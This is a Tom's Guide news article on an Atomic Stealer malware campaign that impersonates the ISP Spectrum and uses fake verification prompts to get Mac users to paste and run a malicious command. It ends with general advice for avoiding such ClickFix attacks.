Macs under threat from new malware campaign impersonating major ISP — how to stay safe

MacBook Pro 2021 (16-inch) on a patio table
(Image credit: Tom's Guide)

Even though people often think Macs are safe from malware, that definitely isn’t true. Case in point, a new Atomic Stealer campaign, which is being used to infect the best MacBooks and other Apple computers with info-stealing malware, has been spotted online.

As reported by The Hacker News, the campaign was discovered by the cybersecurity firm CloudSEK, and it’s believed to be the work of Russian hackers due to comments in the malware’s source code.

What makes this campaign particularly interesting is the fact that, in addition to typosquatting, it also uses social engineering to trick unsuspecting Mac users into falling for it. For those unfamiliar, typosquatting is a type of attack where cybercriminals register lookalike domains in order to lay traps for potential victims who mistype a popular site’s URL into their browser’s address bar. While they might think they’re on a popular company’s website, instead, they’re actually on a fake site designed to mimic the real one, which is also used to spread dangerous malware.

Here’s everything you need to know about this new malware campaign, along with some tips and tricks to prevent you from falling victim to it and other cyberattacks.

Not the Spectrum you were looking for

A screenshot of a fake site impersonating the internet and cable provider Spectrum

(Image credit: CloudSEK/Tom's Guide)

According to CloudSek, the hackers behind this new campaign are impersonating the U.S. internet and cable provider Spectrum using several fake websites. While Spectrum’s official website can be found at spectrum[.]com, the firm's blog post highlights one of these fake sites, which uses the URL panel-spectrum[.]net.

Once on this fake site, potential victims are asked to complete a reCAPTCHA to verify that they aren’t bots. Since many sites use this or similar forms of verification, many people might not even think twice when asked to check a box to prove they’re human. However, on the fake site shared by CloudSek, once verification fails, potential victims are then asked to complete an alternative verification instead.

However, when someone clicks on the button that reads “Alternative Verification”, a command is copied to their clipboard without their knowledge. A set of instructions appears that asks them to open a command prompt, paste the code that was copied to their clipboard, and hit “Enter” to run it on Windows. If someone is using a Mac, though, slightly different instructions are shown that lead to the same outcome: they’re computer is being infected with info-stealing malware.

On Macs, a malicious shell script is used to steal system passwords and download a variant of the Atomic Stealer malware. As CloudSek security researcher Koushik Pal points out in the company’s report, the script “uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”

How to stay safe from Mac malware

A padlock resting next to the Apple logo on the lid of a gold-colored Apple laptop.

(Image credit: robert coolen/Shutterstock)

Given that hackers use all kinds of different tricks to lead potential victims to fake sites spreading malware, it’s always best to type a company’s website into your browser’s address bar manually. However, you should also double-check that you spelled it correctly.

If you don’t know a company’s official site, you can use a search engine to find it. One thing, though, that you want to be careful about is that you’re not clicking the first link that you see. The reason is that on Google and other search engines, the links at the top are often ads, while finding a company’s actual website often requires that you scroll a bit further down the page. The problem with clicking on an ad or a sponsored search result is that cybercriminals often use malicious ads to take users to fake sites instead of to a company’s actual site, as anyone (even hackers) can buy ad space online.

From here, it’s a matter of knowing how to identify a ClickFix attack. Many sites ask that you complete a reCAPTCHA or other form of verification before entering. However, if a site asks you to open a command window and paste something from your clipboard there before hitting “enter”, this is a major red flag. A legitimate company might ask you to select all of the images that are cars, but they would never copy code to your clipboard without your knowledge and then ask you to paste and run it somewhere else.

Although your Mac does come with built-in security software in the form of Apple’s own XProtect, it’s still a good idea to consider investing in one of the best Mac antivirus software solutions. Unlike free antivirus software, these paid options are updated more frequently and are more likely to spot and help you avoid newer malware strains like Atomic Stealer.

Given that attacks using this ClickFix technique have proven both successful and profitable for hackers and other cybercriminals, they’re not going anywhere anytime soon. This is why it makes sense to educate yourself and your family members about these sorts of threats so that you can spot any red flags before your Mac or PC becomes infected with malware.

More from Tom's Guide

Anthony Spadafora
Managing Editor Security and Home Office

Anthony Spadafora is the managing editor for security and home office furniture at Tom’s Guide where he covers everything from data breaches to password managers and the best way to cover your whole home or business with Wi-Fi. He also reviews standing desks, office chairs and other home office accessories with a penchant for building desk setups. Before joining the team, Anthony wrote for ITProPortal while living in Korea and later for TechRadar Pro after moving back to the US. Based in Houston, Texas, when he’s not writing Anthony can be found tinkering with PCs and game consoles, managing cables and upgrading his smart home. 

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.